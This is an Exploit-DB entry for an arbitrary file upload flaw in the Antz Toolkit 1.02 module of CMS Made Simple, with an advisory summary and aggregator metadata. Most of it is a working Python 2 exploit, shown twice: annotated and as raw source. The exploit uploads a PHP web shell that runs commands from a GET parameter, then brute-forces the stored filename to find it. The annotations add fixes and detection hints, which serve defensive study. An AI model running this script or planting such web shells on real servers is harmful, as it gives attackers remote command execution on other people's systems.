ID EDB-ID:34300 Type exploitdb Reporter John Leitch Modified 2010-07-11T00:00:00
Description
CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability. Web-application exploit for the PHP platform.
source: http://www.securityfocus.com/bid/41569/info
The Antz toolkit module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Antz toolkit 1.02 is vulnerable; other versions may also be affected.
import socket
# Target settings: TCP endpoint and the URL prefix under which CMS Made Simple
# is installed.  ``host`` is used for connect() and for the Host header of the
# GET probes; the POST in upload_shell() sends a literal 'Host: localhost'.
host, path, port = 'localhost', '/cmsms', 80
def upload_shell():
    """Proof of concept for the Antz Toolkit upload flaw (EDB-ID 34300), Python 2.

    Two phases, both against the module-level ``host``/``path``/``port``:

    1. POST a hand-built multipart body to ``<path>/include.php`` whose
       ``shell_file`` part carries a user-chosen ``.php`` filename, and treat an
       ``HTTP/1.1 200 OK`` status line as a successful upload.
    2. Sweep ``<path>/modules/antz/tmp/<i>shell.php`` for ``i`` in 0..9998 and
       print the first path that answers 200.  The script expects the stored
       name to be a numeric prefix plus the original filename and does not
       read that prefix from the upload response, hence the brute-force probe.

    What the request demonstrates about the vulnerable handler: it accepts a
    client-supplied filename with an executable extension, the file ends up
    under the web root where the server executes it, and the request carries
    no session cookie or other credential (none is sent below).  Defensive
    fixes: allow-list extensions and content server-side, store uploads outside
    the document root or disable script execution for tmp/, require an
    authenticated session, and use unpredictable stored names.  Detection: a
    multipart POST to include.php followed by a burst of GETs for
    modules/antz/tmp/<n>shell.php from the same client.

    Returns None; progress is reported with Python 2 ``print`` statements.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    # Raw HTTP/1.1 POST, no HTTP library.  Note the Host header is the literal
    # 'localhost' (not ``host``) and Content-Length is fixed for this exact
    # body.  Two form parts: 'antzSeed' sent empty, and 'shell_file' carrying
    # the filename and a short PHP body.
    s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 257\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="antzSeed"\r\n'
           '\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    # Single read; only the leading status line is examined below.
    resp = s.recv(8192)

    s.close()

    http_ok = 'HTTP/1.1 200 OK'

    # Success is judged solely by the status-line prefix of the response.
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    print 'searching for shell'

    # Probe candidate stored names '<i>shell.php', one new connection and one
    # GET per candidate, stopping at the first 200 response.
    for i in range(0, 9999):

        shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(8)

        # Here the Host header does use ``host``, unlike the POST above.
        s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
               'Host: ' + host + '\r\n\r\n')

        if http_ok in s.recv(8192)[:len(http_ok)]:
            print '\r\nshell located at http://' + host + shell_path
            break
        else:
            print '.',
# Script entry point: runs unconditionally at import/execution time (no
# ``__main__`` guard), using the module-level host/path/port settings.
upload_shell()
{"id": "EDB-ID:34300", "hash": "e47275dfda869457585b0cd45330207d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability", "description": "CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability. Webapps exploit for php platform", "published": "2010-07-11T00:00:00", "modified": "2010-07-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/34300/", "reporter": "John Leitch", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:54:23", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-02-03T20:54:23"}, "dependencies": {"references": [], "modified": "2016-02-03T20:54:23"}, "vulnersScore": -0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/34300/", "sourceData": "source: http://www.securityfocus.com/bid/41569/info\r\n\r\nThe Antz toolkit module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.\r\n\r\nAn attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.\r\n\r\nAntz toolkit 1.02 is vulnerable; other versions may also be affected. 
\r\n\r\nimport socket\r\n\r\nhost = 'localhost'\r\npath = '/cmsms'\r\nport = 80\r\n\r\ndef upload_shell():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.settimeout(8) \r\n\r\n s.send('POST ' + path + '/include.php HTTP/1.1\\r\\n'\r\n 'Host: localhost\\r\\n'\r\n 'Proxy-Connection: keep-alive\\r\\n'\r\n 'User-Agent: x\\r\\n'\r\n 'Content-Length: 257\\r\\n'\r\n 'Cache-Control: max-age=0\\r\\n'\r\n 'Origin: null\\r\\n'\r\n 'Content-Type: multipart/form-data; boundary=----x\\r\\n'\r\n 'Accept: text/html\\r\\n'\r\n 'Accept-Encoding: gzip,deflate,sdch\\r\\n'\r\n 'Accept-Language: en-US,en;q=0.8\\r\\n'\r\n 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\\r\\n'\r\n '\\r\\n'\r\n '------x\\r\\n'\r\n 'Content-Disposition: form-data; name=\"antzSeed\"\\r\\n'\r\n '\\r\\n'\r\n '\\r\\n'\r\n '------x\\r\\n'\r\n 'Content-Disposition: form-data; name=\"shell_file\"; filename=\"shell.php\"\\r\\n'\r\n 'Content-Type: application/octet-stream\\r\\n'\r\n '\\r\\n'\r\n '<?php echo \\'<pre>\\' + system($_GET[\\'CMD\\']) + \\'</pre>\\'; ?>\\r\\n'\r\n '------x--\\r\\n'\r\n '\\r\\n')\r\n\r\n resp = s.recv(8192)\r\n\r\n s.close()\r\n\r\n http_ok = 'HTTP/1.1 200 OK'\r\n \r\n if http_ok not in resp[:len(http_ok)]:\r\n print 'error uploading shell'\r\n return\r\n else: print 'shell uploaded'\r\n\r\n print 'searching for shell'\r\n\r\n for i in range(0, 9999):\r\n\r\n shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.settimeout(8) \r\n \r\n s.send('GET ' + shell_path + ' HTTP/1.1\\r\\n'\\\r\n 'Host: ' + host + '\\r\\n\\r\\n')\r\n\r\n if http_ok in s.recv(8192)[:len(http_ok)]:\r\n print '\\r\\nshell located at http://' + host + shell_path\r\n break\r\n else:\r\n print '.',\r\n\r\nupload_shell()\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", 
"robots.models.base.Bulletin"]}